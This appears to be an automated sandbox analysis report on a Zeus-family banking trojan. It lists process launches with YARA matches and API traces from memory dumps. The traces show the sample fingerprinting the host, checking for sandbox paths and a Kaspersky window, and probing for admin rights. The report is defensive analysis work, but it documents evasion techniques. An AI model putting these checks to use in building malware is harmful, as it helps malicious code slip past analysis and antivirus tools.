                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                          Start time:04:53:05
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1796972429.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1797084342.00000000014D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                          Start time:04:53:05
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000007.00000002.1781782931.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000007.00000002.1782094924.0000000002DC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                          Start time:04:53:05
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000B.00000002.1783966144.0000000002D90000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000B.00000002.1784273852.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                          Start time:04:53:05
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 756
                                                                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                          Start time:04:53:05
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 772
                                                                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                          Start time:04:53:05
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000E.00000002.1695271087.0000000002AE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000E.00000002.1692126085.0000000002A80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                          Start time:04:53:06
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000010.00000002.1708419201.0000000002BA0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000010.00000002.1707606160.00000000029F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                          Start time:04:53:06
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 736
                                                                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                          Start time:04:53:06
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 800
                                                                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                          Start time:04:53:07
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.1711573313.0000000002440000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.1710398106.0000000002170000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                          Start time:04:53:08
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.1711007542.0000000000D90000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.1711887152.0000000002A10000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                          Start time:04:53:08
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001A.00000002.1714288290.0000000002490000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001A.00000002.1713723787.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                          Start time:04:53:09
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001C.00000002.1718939420.0000000002B00000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001C.00000002.1718079972.00000000029A0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                          Start time:04:53:09
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001E.00000002.1723103322.00000000020D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001E.00000002.1724014803.0000000002480000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                          Start time:04:53:09
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000020.00000002.1727055107.00000000032F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000020.00000002.1726470289.0000000003040000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                          Start time:04:53:10
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000022.00000002.1732800865.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000022.00000002.1733188359.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                          Start time:04:53:10
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.1734272872.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.1733713050.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                          Start time:04:53:11
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000026.00000002.1740627207.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000026.00000002.1741539824.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Reset < >
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                              • Part of subcall function 00403A20: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                              • Part of subcall function 00403A20: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                              • Part of subcall function 00403A20: RegCloseKey.KERNELBASE(?), ref: 00403A93
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                              • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                              • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                              • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                              • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                            • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                            • String ID: IsWow64Process$PnSw$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                            • API String ID: 3353599405-1027215798
                                                                                                                                                                                                            • Opcode ID: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                            • Instruction ID: a3246fa232e6b5ad05535f44e20517c4174ab377f4a657e755d7089196f7c676
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 085161B0640212ABDB1077B1DF0EB5B3668AF90785F10413ABB05F51E1DBFC9D818AAD
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00403A93
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                            • StrStrIA.KERNELBASE(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
